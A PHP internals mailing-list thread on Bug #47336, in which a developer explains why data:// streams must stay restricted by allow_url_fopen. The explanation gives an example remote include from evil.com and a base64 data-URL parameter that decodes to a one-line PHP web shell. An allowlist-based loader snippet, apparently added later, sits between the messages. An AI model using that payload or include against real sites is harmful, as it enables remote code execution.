RE: [PHP-DEV] data stream restricted by allow_url_fopen (Bug #47336)
> If include of data urls is enabled, the attacker could do the same with
> &file=data:image/png;base64,PD9waHAgZXZhbCgkX0dFVFsiY29kZSJdKTsgPz4K

Okay, I got it ;-)

So it would be nice if someone could update the documentation and set the bug to "resolved"

Thanks for your help.
Re: [PHP-DEV] data stream restricted by allow_url_fopen (Bug #47336)
On 11/03/13 12:36, Christian Stoller wrote:
> Hi Stas.
>> I'm afraid it is not a good idea. allow_url_fopen is meant to protect
>> file functions (fopen and friends) from being injected with
>> user-controlled data - i.e. if you control the filesystem and you do
>> fopen() under allow_url_fopen then it is reasonable to assume the data
>> under that filename is under your control. However, data:// URLs clearly
>> violate this assumption no less than http:// URLs do - data: just does
>> it without even requiring a web server.
> I am unsure whether I understand you. As far as I know with the data://
> stream PHP does not access any file on the filesystem. It's just for
> transforming normal content in a variable to a resource, or not? So I do not
> see any risk. Maybe you can give me an example.

Suppose you had the silly script: http://evil.com/backdoor-code and php would happily run the php code located at http://evil.com/backdoor-code.php

If include of data urls is enabled, the attacker could do the same with
&file=data:image/png;base64,PD9waHAgZXZhbCgkX0dFVFsiY29kZSJdKTsgPz4K

--
PHP Internals - PHP Runtime Development Mailing List
To unsubscribe, visit: http://www.php.net/unsub.php
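As an added illustration of the risk described in the message above (not code from the thread or from PHP itself): a page loader that uses the request value only as a key into a fixed allowlist, so neither an `http://` nor a `data:` value can reach `include`. The page names, the `PAGES` constant, `resolve_page()` and the temporary directory are assumptions made for the example.

```php
<?php
declare(strict_types=1);

// Hypothetical allowlist: request value => file name inside the page directory.
const PAGES = [
    'home'  => 'home.php',
    'about' => 'about.php',
];

/**
 * Map a user-supplied page name to an absolute file path, or null.
 * The user value is only used as an array key, so strings such as
 * "http://..." or "data:..." never become part of the included path.
 */
function resolve_page(string $requested, string $pageDir): ?string
{
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath($pageDir);
    $path = realpath($pageDir . '/' . PAGES[$requested]);
    if ($base === false || $path === false) {
        return null; // directory or file missing
    }
    // Guard against a symlink that points outside the page directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Demo setup (constructed): a temporary page directory with one page.
$dir = sys_get_temp_dir() . '/pages_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . '/about.php', "<?php echo 'about page';\n");

// Constructed inputs: a valid name, then the two URL forms from the thread.
$samples = ['about', 'http://evil.com/backdoor-code', 'data:text/plain;base64,aGVsbG8='];
foreach ($samples as $value) {
    $path = resolve_page($value, $dir);
    printf("%-35s => %s\n", $value, $path === null ? 'rejected' : "include $path");
}

unlink($dir . '/about.php');
rmdir($dir);
```

Because the lookup rejects anything that is not a known key, the result does not depend on how `allow_url_fopen` or `allow_url_include` treat a given wrapper.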
RE: [PHP-DEV] data stream restricted by allow_url_fopen (Bug #47336)
Hi Stas.

> I'm afraid it is not a good idea. allow_url_fopen is meant to protect
> file functions (fopen and friends) from being injected with
> user-controlled data - i.e. if you control the filesystem and you do
> fopen() under allow_url_fopen then it is reasonable to assume the data
> under that filename is under your control. However, data:// URLs clearly
> violate this assumption no less than http:// URLs do - data: just does
> it without even requiring a web server.

I am unsure whether I understand you. As far as I know with the data:// stream PHP does not access any file on the filesystem. It's just for transforming normal content in a variable to a resource, or not? So I do not see any risk. Maybe you can give me an example.
Re: [PHP-DEV] data stream restricted by allow_url_fopen (Bug #47336)
Hi!

> I have run into a bug, which is open since 2009. It would be nice if
> you could look at https://bugs.php.net/bug.php?id=47336 It has been
> marked as “documentation problem”. But in my opinion the
> implementation should follow the documentation and allow fopen
> “data://” streams even if “allow_url_fopen” is set to “false”.
> Because it is not like opening a maybe manipulated URL.
>
> It would be really nice if this bug could be fixed, soon.

I'm afraid it is not a good idea. allow_url_fopen is meant to protect file functions (fopen and friends) from being injected with user-controlled data - i.e. if you control the filesystem and you do fopen() under allow_url_fopen then it is reasonable to assume the data under that filename is under your control. However, data:// URLs clearly violate this assumption no less than http:// URLs do - data: just does it without even requiring a web server.

--
Stanislav Malyshev, Software Architect
SugarCRM: http://www.sugarcrm.com/
(408)454-6900 ext. 227